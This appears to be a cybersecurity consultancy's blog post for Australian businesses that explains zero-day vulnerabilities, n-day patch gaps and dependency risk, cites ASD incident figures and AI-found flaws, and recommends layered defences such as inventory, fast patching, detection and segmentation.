What a zero-day really is — and why even fully patched software isn't always safe

What is a zero-day?

A zero-day is a software vulnerability that the people responsible for fixing it — the vendor, the open-source maintainer, your IT team — have had zero days to address. The name refers to the defender's head start, and the head start is none. Someone, usually an attacker or a researcher, knows about the flaw before a patch exists. Until that patch is written, tested, and installed, every machine running the affected software is exposed, no matter how diligently it has been maintained.

It is worth separating three terms that get used loosely:

• A zero-day vulnerability is the flaw itself — a coding mistake or design weakness that nobody on the defensive side has identified.

• A zero-day exploit is the technique an attacker builds to take advantage of that flaw.

• A zero-day attack is the moment that exploit gets used in the wild against real systems.

The defining feature of all three is the knowledge gap. The attacker knows something the defender does not, and there is no fix available to close the door.

Zero-day vs the bugs you can simply patch

Most of the vulnerabilities your business faces are not zero-days. They are n-days — known flaws with a patch already available, where the “n” is the number of days since disclosure. These are the bread and butter of cybercrime, because most organisations are slow to patch. Attackers do not need anything exotic when a published fix has been sitting unapplied on thousands of internet-facing servers for weeks.

A zero-day is a different animal. There is no patch to apply slowly, because there is no patch at all. This is precisely why zero-days are so prized — and so expensive.

Where zero-days come from

Zero-days are not magic. They come from the same place every other bug does: human beings writing imperfect code. Modern software is staggeringly complex, built in layers, stitched together from libraries written years or decades ago by people who have long since moved on. Somewhere in those millions of lines, mistakes hide.

What changes is who finds them first. A zero-day is born the moment someone with the means and motive to exploit it discovers a flaw before the good guys do. That someone might be a criminal group, a state-sponsored actor, or a freelance researcher who sells what they find. There is a thriving market here. A working exploit for a widely used product — a mobile operating system, a popular VPN appliance, a browser — can sell for hundreds of thousands of dollars, sometimes more. Governments buy them. Brokers trade them. The incentives to keep a flaw secret rather than report it are very real.

Why even fully patched software isn't always safe

This is the part that catches businesses off guard, so it is worth being blunt about it. “Fully patched” does not mean “fully protected,” for several stubborn reasons.

• There is always a window. By definition, a zero-day exists before the patch does. A perfectly maintained server, updated within the hour of every release, is still defenceless against a flaw the vendor has not yet discovered. Diligence shrinks your exposure dramatically — it does not eliminate it.

• The patch gap works against you. When a vendor finally releases a fix, the clock does not stop; it starts. Attackers reverse-engineer the patch to understand the flaw, then race to exploit everyone who has not installed it yet. As we noted in our coverage of Anthropic's Claude Mythos model, that race used to be measured in weeks. For some classes of vulnerability it is now down to hours. A patch you have not applied is, functionally, a zero-day waiting to happen.

• You are only as patched as your weakest dependency. Your own systems might be immaculate, but your software sits on top of other people's code — frameworks, libraries, cloud services, third-party plugins. The Mythos findings made this painfully clear: a 16-year-old flaw in FFmpeg, a video library buried underneath an enormous amount of everyday software, and a 27-year-old flaw in OpenBSD, an operating system with a reputation for being one of the most hardened in existence. Decades of human and automated review missed both. You can be fully patched and still inherit a flaw from a component you did not even know you were running.

• Patches are sometimes incomplete. A fix that addresses one path to a vulnerability does not always close every variant. Attackers routinely study a patch, find the bit the vendor missed, and walk straight back in through the side door.

• You can't patch what you can't see. Shadow IT, forgotten servers, an old appliance in a branch office, a system someone spun up for a project and never decommissioned — none of these get patched on schedule, because nobody is tracking them. They are zero-days by neglect.

---

Read more: System hardening guidelines

---

The Australian picture

It is tempting to file zero-days under “problems for Silicon Valley.” They are not. Australian businesses run the same operating systems, the same browsers, and the same cloud platforms as everyone else, which means we inherit the same flaws on the same day the rest of the world does.

The numbers bear this out. The Australian Signals Directorate's Australian Cyber Security Centre responded to more than 1,200 cyber security incidents in the 2024–25 financial year, an 11% rise on the year before, and the report singled out the exploitation of internet-exposed vulnerabilities as a persistent way in for both criminals and state-sponsored actors. Critical sectors took the brunt of it — ransomware incidents against the healthcare sector doubled year on year. The pattern in the big Australian breaches of recent years, from Optus and Medibank onward, has been depressingly consistent: an initial foothold through an exposed weakness, followed by slow detection and a response that arrived too late to contain the damage.

The ASD's Essential Eight puts patching applications and operating systems in its top tier for a reason. Zero-days are the strongest argument going for treating those mandates as an active defensive habit rather than a compliance box to tick once a quarter.

What an ordinary business can realistically do

You cannot patch a flaw that has no patch. That sounds like a dead end, but it is not. The goal shifts from preventing every breach to shrinking the window of exposure and limiting the blast radius when something does get through. That is entirely achievable for a normal business without an unlimited budget.

• Know what you run. You cannot defend an unknown. Maintain an inventory of your software, versions, and dependencies, including the open-source components buried in your applications. When the next big flaw is disclosed, you want to answer “are we affected?” in minutes, not days.

• Patch fast, and automate it. You cannot fix zero-days, but most attacks still ride on known, unpatched flaws. Closing the n-day gap quickly removes the easy wins and forces attackers to spend their expensive zero-days — which most of them would rather not.

• Assume something will get through. Prevention is not enough when the time-to-exploit is measured in hours. Invest in detection — logging, endpoint detection, and behavioural analytics that flag the unusual activity an exploit produces even when the flaw itself is unknown. Watch for the indicators of compromise that betray an intruder already inside.

• Contain the blast radius. Network segmentation, the principle of least privilege, and strong network security mean that a single compromised system does not hand an attacker the keys to everything.

• Mind your supply chain and your cloud. Ask your vendors how quickly they patch and disclose. Understand your cloud vulnerabilities and your software bill of materials, because someone else's flaw is now your problem too.

• Put AI on your side of the line. The same capabilities that let tools like Mythos uncover decades-old flaws can be turned to defence — and they increasingly are. Our guide on using AI to bolster your cyber security covers where it fits.

A final word

A zero-day is a reminder that perfect patching is a worthy goal, not a guarantee. The flaws that hurt most are the ones nobody has named yet, and the honest response is not panic but layered defence: know your environment, close the known gaps fast, watch for trouble, and build so that a single failure does not become a catastrophe. That is unglamorous work, and it is exactly the work that separates the businesses that weather an incident from the ones that make the news.

If you would like help auditing what your business runs, tightening your patching, and preparing for the threats you cannot simply patch away, our team can help. Learn more about our IT consulting services, or get in touch at enquiries@xiphcyber.com.